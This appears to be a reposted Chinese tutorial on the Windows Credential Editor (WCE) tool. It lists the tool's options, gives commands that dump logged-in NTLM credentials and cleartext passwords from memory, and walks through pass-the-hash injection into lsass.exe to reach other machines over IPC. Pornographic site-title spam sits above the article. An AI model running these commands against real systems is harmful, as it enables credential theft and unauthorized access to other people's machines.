日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

WCE-hash注入工具使用

發布時間:2024/1/3 综合教程 32 生活家
生活随笔 收集整理的這篇文章主要介紹了 WCE-hash注入工具使用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

wce的使用說明如下

參數解釋:
-l 列出登錄的會話和NTLM憑據(默認值)
-s 修改當前登錄會話的NTLM憑據參數:<用戶名>:<域名>:<LM哈希>:<NT哈希>
-r 不定期的列出登錄的會話和NTLM憑據,如果找到新的會話,那么每5秒重新列出一次
-c 用一個特殊的NTML憑據運行一個新的會話參數:<cmd>
-e 不定期的列出登錄的會話和NTLM憑據,當產生一個登錄事件的時候重新列出一次
-o 保存所有的輸出到一個文件參數:<文件名>
-i 指定一個LUID代替使用當前登錄會話參數:<luid>
-d 從登錄會話中刪除NTLM憑據參數:<luid>
-a 使用地址參數: <地址>
-f 強制使用安全模式
-g 生成LM和NT的哈希參數<密碼>
-K 緩存kerberos票據到一個文件(unix和windowswce格式)
-k 從一個文件中讀取kerberos票據并插入到windows緩存中
-w 通過摘要式認證緩存一個明文的密碼
-v 詳細輸出

常用命令記錄

wce.exe -w讀取系統管理員明文密碼(sam):

wce.exe -l從內存中讀取已經登錄的信息,而不是讀取sam數據庫中的信息。

-c用來執行cmd,-v顯示詳細,-w查看已經登錄的明文密碼。

下面是-s參數進行hash注入

在上面的使用說明中可以看到,-s參數可以用來hash注入。

hash注入的原理是將我們預備好的目標機器的本地或者是域用戶hash注入到本地的認證進程lsass.exe中去,使得本地在使用ipc登錄目標機器的時候就如同自己登錄自己的機器一樣獲得權限。至于目標機器的本地或者是域用戶hash如何取得那就要發揮你自己的想象力了。hash注入本身是為了對付那些破解不了的NTHASH。

首先我們看本地的hash

具體的命令格式如下:
wce.exe -s 用戶名:對方機器名或者ip:LM-HASH:NT-HASH

當提示注入成功的時候,這時候鍵入net use命令并沒有看到有連接,其實已經可以連接了,直接使用ipc命令操作對方的機器就可以了,如上圖。

其次域里的域用戶hash也可以使用wce進行注入,只需要把命令格式變一變就行

wce.exe -s 用戶名:域名:LM-HASH:NT-HASH

總結

以上是生活随笔為你收集整理的WCE-hash注入工具使用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。